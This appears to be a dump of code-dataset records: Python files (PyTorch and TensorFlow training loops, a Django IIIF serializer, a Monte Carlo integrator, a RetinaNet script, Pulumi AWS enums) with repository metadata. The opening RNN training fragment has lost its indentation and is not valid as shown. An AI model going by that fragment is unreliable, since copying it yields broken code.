optimizer = torch.optim.Adam(rnn_training.parameters(), lr=LR)
loss_func = nn.CrossEntropyLoss()
for epoch in range(EPOCH):
if epoch == 10:
LR = 0.0001
optimizer = torch.optim.Adam(rnn_training.parameters(), lr=LR)
for step, (train, target) in enumerate(train_data):
target = target.long();
b_x = Variable(train.view(-1,4,4))
# print(b_x.shape)
b_y = Variable(target)
if torch.cuda.is_available():
b_x = Variable(b_x).cuda()
b_y = b_y.cuda()
rnn_training = rnn_training.cuda()
optimizer.zero_grad()
output = rnn_training(b_x)
loss = loss_func(output, b_y)
loss.backward()
optimizer.step()
if step % 50 == 0:
train_output = output # (samples, time_step, input_size)
# pred_y = torch.max(train_output, 1)[1].data
pred_y = train_output.data.max(1)[1]
# print(type(pred_y), type(target))
num = (pred_y.eq(b_y.data).sum())
                accuracy = 100 * num / BATCH_SIZE
                print('Epoch: ', epoch, '| train loss: %.4f' % loss, '| train accuracy: %.2f' % accuracy)
torch.save(rnn_training,'rnn_model_b'+str(epoch)+'.pkl')
torch.save(rnn_training, 'rnn_model_final.pkl')
if __name__ == '__main__':
main()
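# Hedged inference sketch (added for illustration, not part of the original file): the loop
# above pickles the whole module with torch.save, so torch.load can restore it directly.
# The real board encoding lives in the repo's data_loader (not shown); feeding the raw 4x4
# board as floats below is only a placeholder for that preprocessing.
def predict_direction(board_4x4, model_path='rnn_model_final.pkl'):
    """Return the predicted move index (0-3) for a single 4x4 board."""
    model = torch.load(model_path, map_location='cpu')
    model.eval()
    x = torch.as_tensor(np.asarray(board_4x4, dtype=np.float32)).view(1, 4, 4)  # (batch, time_step, input_size)
    with torch.no_grad():
        logits = model(x)
    return int(logits.argmax(dim=1).item())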
| 0
| 0
| 0
| 394
| 0
| 2,003
| 0
| 23
| 201
|
ce512afce118edf2c22282a539009707e00c705b
| 1,877
|
py
|
Python
|
apps/iiif/serializers/annotation_list.py
|
ecds/readux
|
4eac8b48efef8126f4f2be28b5eb943c85a89c2e
|
[
"Apache-2.0"
] | 18
|
2017-06-12T09:58:02.000Z
|
2021-10-01T11:14:34.000Z
|
apps/iiif/serializers/annotation_list.py
|
ecds/readux
|
4eac8b48efef8126f4f2be28b5eb943c85a89c2e
|
[
"Apache-2.0"
] | 276
|
2019-04-26T20:13:01.000Z
|
2022-03-31T10:26:28.000Z
|
apps/iiif/serializers/annotation_list.py
|
ecds/readux
|
4eac8b48efef8126f4f2be28b5eb943c85a89c2e
|
[
"Apache-2.0"
] | 7
|
2018-03-13T23:44:26.000Z
|
2021-09-15T17:54:55.000Z
|
# pylint: disable = attribute-defined-outside-init, too-few-public-methods
"""Module for serializing IIIF Annotation Lists"""
from django.contrib.auth import get_user_model
USER = get_user_model()
| 36.096154
| 90
| 0.583378
|
# pylint: disable = attribute-defined-outside-init, too-few-public-methods
"""Module for serializing IIIF Annotation Lists"""
import json
from django.core.serializers import serialize
from django.core.serializers.base import SerializerDoesNotExist
from .base import Serializer as JSONSerializer
from django.contrib.auth import get_user_model
from django.db.models import Q
import config.settings.local as settings
USER = get_user_model()
class Serializer(JSONSerializer):
"""
IIIF V2 Annotation List https://iiif.io/api/presentation/2.1/#annotation-list
"""
def _init_options(self):
super()._init_options()
self.owners = self.json_kwargs.pop('owners', 0)
def get_dump_object(self, obj):
# TODO: Add more validation checks before trying to serialize.
if self.version == 'v2' or self.version is None:
data = {
"@context": "http://iiif.io/api/presentation/2/context.json",
"@id": '{h}/iiif/v2/{m}/list/{c}'.format(
h=settings.HOSTNAME,
m=obj.manifest.pid,
c=obj.pid
),
"@type": "sc:AnnotationList",
"resources": json.loads(
serialize(
'annotation',
obj.annotation_set.filter(
Q(owner=USER.objects.get(username='ocr')) |
Q(owner__in=self.owners)
),
is_list=True)
)
}
return data
return None
class Deserializer:
"""Deserialize IIIF Annotation List
:raises SerializerDoesNotExist: Not yet implemented.
"""
def __init__(self, *args, **kwargs):
raise SerializerDoesNotExist("annotation_list is a serialization-only serializer")
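# Hypothetical wiring, not taken from the source: Django discovers custom serializers via
# the SERIALIZATION_MODULES setting, after which serialize() can be called with the
# registered format name plus the 'owners' kwarg popped in _init_options above. The
# 'version' kwarg is assumed to be consumed by the base Serializer (not shown here).
#
# settings.py
# SERIALIZATION_MODULES = {'annotation_list': 'apps.iiif.serializers.annotation_list'}
#
# in a view
# from django.core.serializers import serialize
# payload = serialize('annotation_list', [annotation_list_obj],
#                     version='v2', owners=[request.user.id])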
| 0
| 0
| 0
| 1,392
| 0
| 0
| 0
| 109
| 178
|
6ace6f1e7b2b5d4ff7aa95d88b4bbe251e459eca
| 575
|
py
|
Python
|
FOMMS_integrate/stochastic.py
|
nschieber/FOMMS_integrate
|
87456d476ecee45b8a06782da12baa1ce4c08e88
|
[
"BSD-3-Clause"
] | null | null | null |
FOMMS_integrate/stochastic.py
|
nschieber/FOMMS_integrate
|
87456d476ecee45b8a06782da12baa1ce4c08e88
|
[
"BSD-3-Clause"
] | null | null | null |
FOMMS_integrate/stochastic.py
|
nschieber/FOMMS_integrate
|
87456d476ecee45b8a06782da12baa1ce4c08e88
|
[
"BSD-3-Clause"
] | null | null | null |
"""
This function implements 1d Monte Carlo integration
"""
import numpy as np
def monte_1d(x, f, trials):
"""
Compute a 1D definite integral
Parameters
----------
f : function
User defined function.
x : numpy array
Integration domain.
trials : integer
Total number of generated random samples.
Returns
-------
I : float
Integration result.
"""
a = x[0]
b = x[1]
d = (b - a) * np.random.rand(1, trials) + a
y = f(d)
print('Test addition')
return (b-a) * np.sum(y) / trials
| 19.166667
| 52
| 0.553043
|
"""
This function implements 1d Monte Carlo integration
"""
import numpy as np
def monte_1d(x, f, trials):
"""
Compute a 1D definite integral
Parameters
----------
f : function
User defined function.
x : numpy array
Integration domain.
trials : integer
Total number of generated random samples.
Returns
-------
I : float
Integration result.
"""
a = x[0]
b = x[1]
d = (b - a) * np.random.rand(1, trials) + a
y = f(d)
print('Test addition')
return (b-a) * np.sum(y) / trials
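# Worked example (added for illustration): estimate the integral of x**2 over [0, 1],
# whose exact value is 1/3; the Monte Carlo error shrinks roughly like 1/sqrt(trials).
if __name__ == '__main__':
    np.random.seed(0)  # reproducible draw
    estimate = monte_1d(np.array([0.0, 1.0]), lambda t: t ** 2, trials=100000)
    print(estimate)    # ~0.333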
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
138fa2e645bcd4f89b72e76fa68172d58825add1
| 3,047
|
py
|
Python
|
snip/train.py
|
3846chs/SNIP
|
de1771cf4c90edeaa9924ed406293b48ceece7a2
|
[
"MIT"
] | null | null | null |
snip/train.py
|
3846chs/SNIP
|
de1771cf4c90edeaa9924ed406293b48ceece7a2
|
[
"MIT"
] | null | null | null |
snip/train.py
|
3846chs/SNIP
|
de1771cf4c90edeaa9924ed406293b48ceece7a2
|
[
"MIT"
] | null | null | null |
# np.random._bit_generator = np.random.bit_generator
| 45.477612
| 99
| 0.596652
|
import os
import tensorflow.compat.v1 as tf
import time
import numpy as np
# np.random._bit_generator = np.random.bit_generator
from augment import augment
def train(args, model, sess, dataset):
print('|========= START TRAINING =========|')
if not os.path.isdir(args.path_summary): os.makedirs(args.path_summary)
if not os.path.isdir(args.path_model): os.makedirs(args.path_model)
saver = tf.train.Saver()
random_state = np.random.RandomState(9)
writer = {}
writer['train'] = tf.summary.FileWriter(args.path_summary + '/train', sess.graph)
writer['val'] = tf.summary.FileWriter(args.path_summary + '/val')
t_start = time.time()
best_val_loss = 100
for itr in range(args.train_iterations):
batch = dataset.get_next_batch('train', args.training_batch_size)
batch = augment(batch, args.aug_kinds, random_state)
feed_dict = {}
feed_dict.update({model.inputs[key]: batch[key] for key in ['input', 'label']})
feed_dict.update({model.compress: False, model.is_train: True, model.pruned: True})
input_tensors = [model.outputs] # always execute the graph outputs
if (itr+1) % args.check_interval == 0:
input_tensors.extend([model.summ_op, model.sparsity])
input_tensors.extend([model.train_op])
result = sess.run(input_tensors, feed_dict)
# Check on validation set.
if (itr+1) % args.check_interval == 0:
batch = dataset.get_next_batch('val', args.training_batch_size)
batch = augment(batch, args.aug_kinds, random_state)
feed_dict = {}
feed_dict.update({model.inputs[key]: batch[key] for key in ['input', 'label']})
feed_dict.update({model.compress: False, model.is_train: False, model.pruned: True})
input_tensors = [model.outputs, model.summ_op, model.sparsity]
result_val = sess.run(input_tensors, feed_dict)
# Check summary and print results
if (itr+1) % args.check_interval == 0:
writer['train'].add_summary(result[1], itr)
writer['val'].add_summary(result_val[1], itr)
pstr = '(train/val) los:{:.3f}/{:.3f} acc:{:.3f}/{:.3f} spa:{:.3f} lr:{:.7f}'.format(
result[0]['los'], result_val[0]['los'],
result[0]['acc'], result_val[0]['acc'],
result[2], result[0]['lr'],
)
print('itr{}: {} (t:{:.1f})'.format(itr+1, pstr, time.time() - t_start))
t_start = time.time()
# Save model
if best_val_loss > result_val[0]['los']:
                print('save model, because best_val_loss({:.3f}) > current_val_loss({:.3f})'.format(
best_val_loss, result_val[0]['los']
))
saver.save(sess, args.path_model + '/itr-' + str(itr))
best_val_loss = result_val[0]['los']
# # Save model
# if (itr+1) % args.save_interval == 0:
# saver.save(sess, args.path_model + '/itr-' + str(itr))
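# Hypothetical argument surface for train() above (added for illustration), inferred from
# the attributes the loop reads; the names and values are assumptions, and the real ones
# come from the repo's own CLI parser, while model/sess/dataset must be built by the
# repo's network and dataset constructors.
from types import SimpleNamespace

example_args = SimpleNamespace(
    path_summary='./summary',    # TensorBoard logs, split into /train and /val
    path_model='./model',        # checkpoint directory for tf.train.Saver
    train_iterations=10000,
    training_batch_size=128,
    aug_kinds=[],                # forwarded to augment()
    check_interval=100,          # validation/logging period
    save_interval=1000,          # only used by the commented-out saver block
)
# train(example_args, model, sess, dataset)  # model/sess/dataset come from the repo's builders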
| 0
| 0
| 0
| 0
| 0
| 2,866
| 0
| -7
| 134
|
0e58e67d4649d5ef878008d9074dacf7645f53e2
| 4,768
|
py
|
Python
|
m1_resnet.py
|
VinGPan/Kaggle-HumanProtein
|
4d1abcc7f46774355644d30428ed6c73b28fd782
|
[
"Apache-2.0"
] | null | null | null |
m1_resnet.py
|
VinGPan/Kaggle-HumanProtein
|
4d1abcc7f46774355644d30428ed6c73b28fd782
|
[
"Apache-2.0"
] | null | null | null |
m1_resnet.py
|
VinGPan/Kaggle-HumanProtein
|
4d1abcc7f46774355644d30428ed6c73b28fd782
|
[
"Apache-2.0"
] | null | null | null |
from keras_retinanet.bin.train import train_main
import os
if __name__ == '__main__':
os.chdir("../")
model_name = 'resnet101'
train_main(0, None, ["csv", "data/trn1.csv", "data/classes.csv",
"--val-annotations", "data/val1.csv"])
# model_name = 'resnet50'
# h5s = glob.glob("run1_resnet_50/*.h5")
# results = []
# best_f1 = 0
# for h5 in h5s:
# y_true, y_pred = train_main(1, h5, ["csv", "data/trn1.csv", "data/classes.csv",
# "--val-annotations", "data/val1.csv"])
# f1_max = 0
# th_max = 0
# pr_cnt_max = 0
# for th in np.linspace(0.0, 1.0, num=21):
# for pr_cnt in range(1, 7):
# y_pred_new = []
# for prd in y_pred:
# ref_p = prd[(np.argsort(prd))[-pr_cnt]]
# dec = (prd >= ref_p) & (prd >= th)
# y_pred_new.append(dec)
# f1_cur = f1_score(y_true, np.array(y_pred_new, dtype='int'), average='macro')
# if f1_cur >= f1_max:
# f1_max = f1_cur
# th_max = th
# pr_cnt_max = pr_cnt
# results.append((h5, th_max, pr_cnt_max, f1_max))
# print([h5, th_max, pr_cnt_max, f1_max])
# if f1_max >= best_f1:
# best_f1 = f1_max
# print("current best = ", best_f1)
#
# results = sorted(results, key=lambda x:x[-1], reverse=True)
# for r in results:
# print(r)
#[('snapshots\\resnet50_csv_44.h5', 0.05, 0.44536340852130324), ('snapshots\\resnet50_csv_48.h5', 0.05, 0.445054945054945), ('snapshots\\resnet50_csv_34.h5', 0.05, 0.437181855500821), ('snapshots\\resnet50_csv_49.h5', 0.0, 0.4327235488525811), ('snapshots\\resnet50_csv_45.h5', 0.05, 0.42369674185463657), ('snapshots\\resnet50_csv_28.h5', 0.0, 0.41797258297258294), ('snapshots\\resnet50_csv_22.h5', 0.1, 0.40782312925170067), ('snapshots\\resnet50_csv_30.h5', 0.05, 0.40745030745030747), ('snapshots\\resnet50_csv_50.h5', 0.1, 0.4013157894736842), ('snapshots\\resnet50_csv_37.h5', 0.0, 0.39436633627810097), ('snapshots\\resnet50_csv_47.h5', 0.0, 0.3908092403628118), ('snapshots\\resnet50_csv_41.h5', 0.2, 0.38839285714285715), ('snapshots\\resnet50_csv_35.h5', 0.15000000000000002, 0.38822228496141536), ('snapshots\\resnet50_csv_36.h5', 0.1, 0.38399981614267326), ('snapshots\\resnet50_csv_43.h5', 0.05, 0.3828025149453721), ('snapshots\\resnet50_csv_17.h5', 0.15000000000000002, 0.3746598639455782), ('snapshots\\resnet50_csv_21.h5', 0.05, 0.37316799237981496), ('snapshots\\resnet50_csv_29.h5', 0.0, 0.3672226582940869), ('snapshots\\resnet50_csv_32.h5', 0.1, 0.3669642857142857), ('snapshots\\resnet50_csv_39.h5', 0.05, 0.3659983291562239), ('snapshots\\resnet50_csv_33.h5', 0.05, 0.36450650157546705), ('snapshots\\resnet50_csv_46.h5', 0.1, 0.3637418137418137), ('snapshots\\resnet50_csv_42.h5', 0.0, 0.3635427827546054), ('snapshots\\resnet50_csv_25.h5', 0.05, 0.36262793405650545), ('snapshots\\resnet50_csv_11.h5', 0.05, 0.3579434337837699), ('snapshots\\resnet50_csv_27.h5', 0.05, 0.3495562586818953), ('snapshots\\resnet50_csv_40.h5', 0.0, 0.3492804814233386), ('snapshots\\resnet50_csv_31.h5', 0.05, 0.348015873015873), ('snapshots\\resnet50_csv_38.h5', 0.0, 0.3360606404724052), ('snapshots\\resnet50_csv_18.h5', 0.05, 0.3308032303830623), ('snapshots\\resnet50_csv_16.h5', 0.1, 0.32845804988662136), ('snapshots\\resnet50_csv_14.h5', 0.05, 0.32814818234986304), ('snapshots\\resnet50_csv_26.h5', 0.1, 0.3254329004329004), ('snapshots\\resnet50_csv_19.h5', 0.05, 0.3204281712685074), ('snapshots\\resnet50_csv_15.h5', 0.0, 0.3152310924369747), ('snapshots\\resnet50_csv_20.h5', 0.1, 0.29930213464696226), ('snapshots\\resnet50_csv_10.h5', 0.05, 0.2901406742663109), ('snapshots\\resnet50_csv_13.h5', 0.1, 0.27293083900226756), ('snapshots\\resnet50_csv_24.h5', 0.1, 0.2708245722531437), ('snapshots\\resnet50_csv_12.h5', 0.1, 0.2673262853528508), ('snapshots\\resnet50_csv_23.h5', 0.1, 0.2638221955448846), ('snapshots\\resnet50_csv_04.h5', 0.25, 0.24969474969474967), ('snapshots\\resnet50_csv_09.h5', 0.05, 0.24739891704177416), ('snapshots\\resnet50_csv_05.h5', 0.2, 0.24424342105263158), ('snapshots\\resnet50_csv_06.h5', 0.15000000000000002, 0.23761446886446885), ('snapshots\\resnet50_csv_07.h5', 0.15000000000000002, 0.233078231292517), ('snapshots\\resnet50_csv_03.h5', 0.15000000000000002, 0.21793958962895502), ('snapshots\\resnet50_csv_01.h5', 0.05, 0.19410188317751345), ('snapshots\\resnet50_csv_02.h5', 0.05, 0.19065212731754366), ('snapshots\\resnet50_csv_08.h5', 0.15000000000000002, 0.18758503401360543)]
| 103.652174
| 3,138
| 0.676594
|
from keras_retinanet.bin.train import train_main
from keras_retinanet import models
import glob
import numpy as np
from sklearn.metrics import f1_score
import os
if __name__ == '__main__':
os.chdir("../")
model_name = 'resnet101'
train_main(0, None, ["csv", "data/trn1.csv", "data/classes.csv",
"--val-annotations", "data/val1.csv"])
# model_name = 'resnet50'
# h5s = glob.glob("run1_resnet_50/*.h5")
# results = []
# best_f1 = 0
# for h5 in h5s:
# y_true, y_pred = train_main(1, h5, ["csv", "data/trn1.csv", "data/classes.csv",
# "--val-annotations", "data/val1.csv"])
# f1_max = 0
# th_max = 0
# pr_cnt_max = 0
# for th in np.linspace(0.0, 1.0, num=21):
# for pr_cnt in range(1, 7):
# y_pred_new = []
# for prd in y_pred:
# ref_p = prd[(np.argsort(prd))[-pr_cnt]]
# dec = (prd >= ref_p) & (prd >= th)
# y_pred_new.append(dec)
# f1_cur = f1_score(y_true, np.array(y_pred_new, dtype='int'), average='macro')
# if f1_cur >= f1_max:
# f1_max = f1_cur
# th_max = th
# pr_cnt_max = pr_cnt
# results.append((h5, th_max, pr_cnt_max, f1_max))
# print([h5, th_max, pr_cnt_max, f1_max])
# if f1_max >= best_f1:
# best_f1 = f1_max
# print("current best = ", best_f1)
#
# results = sorted(results, key=lambda x:x[-1], reverse=True)
# for r in results:
# print(r)
#[('snapshots\\resnet50_csv_44.h5', 0.05, 0.44536340852130324), ('snapshots\\resnet50_csv_48.h5', 0.05, 0.445054945054945), ('snapshots\\resnet50_csv_34.h5', 0.05, 0.437181855500821), ('snapshots\\resnet50_csv_49.h5', 0.0, 0.4327235488525811), ('snapshots\\resnet50_csv_45.h5', 0.05, 0.42369674185463657), ('snapshots\\resnet50_csv_28.h5', 0.0, 0.41797258297258294), ('snapshots\\resnet50_csv_22.h5', 0.1, 0.40782312925170067), ('snapshots\\resnet50_csv_30.h5', 0.05, 0.40745030745030747), ('snapshots\\resnet50_csv_50.h5', 0.1, 0.4013157894736842), ('snapshots\\resnet50_csv_37.h5', 0.0, 0.39436633627810097), ('snapshots\\resnet50_csv_47.h5', 0.0, 0.3908092403628118), ('snapshots\\resnet50_csv_41.h5', 0.2, 0.38839285714285715), ('snapshots\\resnet50_csv_35.h5', 0.15000000000000002, 0.38822228496141536), ('snapshots\\resnet50_csv_36.h5', 0.1, 0.38399981614267326), ('snapshots\\resnet50_csv_43.h5', 0.05, 0.3828025149453721), ('snapshots\\resnet50_csv_17.h5', 0.15000000000000002, 0.3746598639455782), ('snapshots\\resnet50_csv_21.h5', 0.05, 0.37316799237981496), ('snapshots\\resnet50_csv_29.h5', 0.0, 0.3672226582940869), ('snapshots\\resnet50_csv_32.h5', 0.1, 0.3669642857142857), ('snapshots\\resnet50_csv_39.h5', 0.05, 0.3659983291562239), ('snapshots\\resnet50_csv_33.h5', 0.05, 0.36450650157546705), ('snapshots\\resnet50_csv_46.h5', 0.1, 0.3637418137418137), ('snapshots\\resnet50_csv_42.h5', 0.0, 0.3635427827546054), ('snapshots\\resnet50_csv_25.h5', 0.05, 0.36262793405650545), ('snapshots\\resnet50_csv_11.h5', 0.05, 0.3579434337837699), ('snapshots\\resnet50_csv_27.h5', 0.05, 0.3495562586818953), ('snapshots\\resnet50_csv_40.h5', 0.0, 0.3492804814233386), ('snapshots\\resnet50_csv_31.h5', 0.05, 0.348015873015873), ('snapshots\\resnet50_csv_38.h5', 0.0, 0.3360606404724052), ('snapshots\\resnet50_csv_18.h5', 0.05, 0.3308032303830623), ('snapshots\\resnet50_csv_16.h5', 0.1, 0.32845804988662136), ('snapshots\\resnet50_csv_14.h5', 0.05, 0.32814818234986304), ('snapshots\\resnet50_csv_26.h5', 0.1, 0.3254329004329004), ('snapshots\\resnet50_csv_19.h5', 0.05, 0.3204281712685074), ('snapshots\\resnet50_csv_15.h5', 0.0, 0.3152310924369747), ('snapshots\\resnet50_csv_20.h5', 0.1, 0.29930213464696226), ('snapshots\\resnet50_csv_10.h5', 0.05, 0.2901406742663109), ('snapshots\\resnet50_csv_13.h5', 0.1, 0.27293083900226756), ('snapshots\\resnet50_csv_24.h5', 0.1, 0.2708245722531437), ('snapshots\\resnet50_csv_12.h5', 0.1, 0.2673262853528508), ('snapshots\\resnet50_csv_23.h5', 0.1, 0.2638221955448846), ('snapshots\\resnet50_csv_04.h5', 0.25, 0.24969474969474967), ('snapshots\\resnet50_csv_09.h5', 0.05, 0.24739891704177416), ('snapshots\\resnet50_csv_05.h5', 0.2, 0.24424342105263158), ('snapshots\\resnet50_csv_06.h5', 0.15000000000000002, 0.23761446886446885), ('snapshots\\resnet50_csv_07.h5', 0.15000000000000002, 0.233078231292517), ('snapshots\\resnet50_csv_03.h5', 0.15000000000000002, 0.21793958962895502), ('snapshots\\resnet50_csv_01.h5', 0.05, 0.19410188317751345), ('snapshots\\resnet50_csv_02.h5', 0.05, 0.19065212731754366), ('snapshots\\resnet50_csv_08.h5', 0.15000000000000002, 0.18758503401360543)]
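# Self-contained sketch (added for illustration) of the threshold / top-k grid search that
# the commented block above describes, runnable on synthetic multi-label predictions; it
# assumes scikit-learn >= 0.22 for the zero_division argument.
def _search_threshold_topk(y_true, y_prob):
    best = (0.0, 0.0, 1)                                         # (macro F1, threshold, top-k)
    for th in np.linspace(0.0, 1.0, num=21):
        for k in range(1, 7):
            kth_best = np.sort(y_prob, axis=1)[:, -k][:, None]   # k-th largest prob per sample
            y_pred = ((y_prob >= kth_best) & (y_prob >= th)).astype(int)
            f1_cur = f1_score(y_true, y_pred, average='macro', zero_division=0)
            if f1_cur >= best[0]:
                best = (f1_cur, th, k)
    return best
# rng = np.random.RandomState(0)
# y_true = (rng.rand(200, 28) < 0.1).astype(int)
# y_prob = np.clip(y_true * 0.6 + rng.rand(200, 28) * 0.5, 0, 1)
# print('best macro F1 %.3f at threshold %.2f, top-%d' % _search_threshold_topk(y_true, y_prob))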
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 15
| 88
|
27d6a355d2304d3fc689d470c15bce5dbf127caf
| 5,795
|
py
|
Python
|
sdk/python/pulumi_aws_native/customerprofiles/_enums.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 29
|
2021-09-30T19:32:07.000Z
|
2022-03-22T21:06:08.000Z
|
sdk/python/pulumi_aws_native/customerprofiles/_enums.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 232
|
2021-09-30T19:26:26.000Z
|
2022-03-31T23:22:06.000Z
|
sdk/python/pulumi_aws_native/customerprofiles/_enums.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 4
|
2021-11-10T19:42:01.000Z
|
2022-02-05T10:15:49.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
__all__ = [
'IntegrationConnectorType',
'IntegrationMarketoConnectorOperator',
'IntegrationOperatorPropertiesKeys',
'IntegrationS3ConnectorOperator',
'IntegrationSalesforceConnectorOperator',
'IntegrationScheduledTriggerPropertiesDataPullMode',
'IntegrationServiceNowConnectorOperator',
'IntegrationTaskType',
'IntegrationTriggerType',
'IntegrationZendeskConnectorOperator',
'ObjectTypeFieldContentType',
'ObjectTypeKeyStandardIdentifiersItem',
]
| 30.025907
| 80
| 0.718033
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'IntegrationConnectorType',
'IntegrationMarketoConnectorOperator',
'IntegrationOperatorPropertiesKeys',
'IntegrationS3ConnectorOperator',
'IntegrationSalesforceConnectorOperator',
'IntegrationScheduledTriggerPropertiesDataPullMode',
'IntegrationServiceNowConnectorOperator',
'IntegrationTaskType',
'IntegrationTriggerType',
'IntegrationZendeskConnectorOperator',
'ObjectTypeFieldContentType',
'ObjectTypeKeyStandardIdentifiersItem',
]
class IntegrationConnectorType(str, Enum):
SALESFORCE = "Salesforce"
MARKETO = "Marketo"
SERVICE_NOW = "ServiceNow"
ZENDESK = "Zendesk"
S3 = "S3"
class IntegrationMarketoConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
BETWEEN = "BETWEEN"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationOperatorPropertiesKeys(str, Enum):
VALUE = "VALUE"
VALUES = "VALUES"
DATA_TYPE = "DATA_TYPE"
UPPER_BOUND = "UPPER_BOUND"
LOWER_BOUND = "LOWER_BOUND"
SOURCE_DATA_TYPE = "SOURCE_DATA_TYPE"
DESTINATION_DATA_TYPE = "DESTINATION_DATA_TYPE"
VALIDATION_ACTION = "VALIDATION_ACTION"
MASK_VALUE = "MASK_VALUE"
MASK_LENGTH = "MASK_LENGTH"
TRUNCATE_LENGTH = "TRUNCATE_LENGTH"
MATH_OPERATION_FIELDS_ORDER = "MATH_OPERATION_FIELDS_ORDER"
CONCAT_FORMAT = "CONCAT_FORMAT"
SUBFIELD_CATEGORY_MAP = "SUBFIELD_CATEGORY_MAP"
class IntegrationS3ConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
BETWEEN = "BETWEEN"
LESS_THAN_OR_EQUAL_TO = "LESS_THAN_OR_EQUAL_TO"
GREATER_THAN_OR_EQUAL_TO = "GREATER_THAN_OR_EQUAL_TO"
EQUAL_TO = "EQUAL_TO"
NOT_EQUAL_TO = "NOT_EQUAL_TO"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationSalesforceConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
CONTAINS = "CONTAINS"
BETWEEN = "BETWEEN"
LESS_THAN_OR_EQUAL_TO = "LESS_THAN_OR_EQUAL_TO"
GREATER_THAN_OR_EQUAL_TO = "GREATER_THAN_OR_EQUAL_TO"
EQUAL_TO = "EQUAL_TO"
NOT_EQUAL_TO = "NOT_EQUAL_TO"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationScheduledTriggerPropertiesDataPullMode(str, Enum):
INCREMENTAL = "Incremental"
COMPLETE = "Complete"
class IntegrationServiceNowConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
CONTAINS = "CONTAINS"
BETWEEN = "BETWEEN"
LESS_THAN_OR_EQUAL_TO = "LESS_THAN_OR_EQUAL_TO"
GREATER_THAN_OR_EQUAL_TO = "GREATER_THAN_OR_EQUAL_TO"
EQUAL_TO = "EQUAL_TO"
NOT_EQUAL_TO = "NOT_EQUAL_TO"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationTaskType(str, Enum):
ARITHMETIC = "Arithmetic"
FILTER = "Filter"
MAP = "Map"
MASK = "Mask"
MERGE = "Merge"
TRUNCATE = "Truncate"
VALIDATE = "Validate"
class IntegrationTriggerType(str, Enum):
SCHEDULED = "Scheduled"
EVENT = "Event"
ON_DEMAND = "OnDemand"
class IntegrationZendeskConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
GREATER_THAN = "GREATER_THAN"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class ObjectTypeFieldContentType(str, Enum):
"""
The content type of the field. Used for determining equality when searching.
"""
STRING = "STRING"
NUMBER = "NUMBER"
PHONE_NUMBER = "PHONE_NUMBER"
EMAIL_ADDRESS = "EMAIL_ADDRESS"
NAME = "NAME"
class ObjectTypeKeyStandardIdentifiersItem(str, Enum):
PROFILE = "PROFILE"
UNIQUE = "UNIQUE"
SECONDARY = "SECONDARY"
LOOKUP_ONLY = "LOOKUP_ONLY"
NEW_ONLY = "NEW_ONLY"
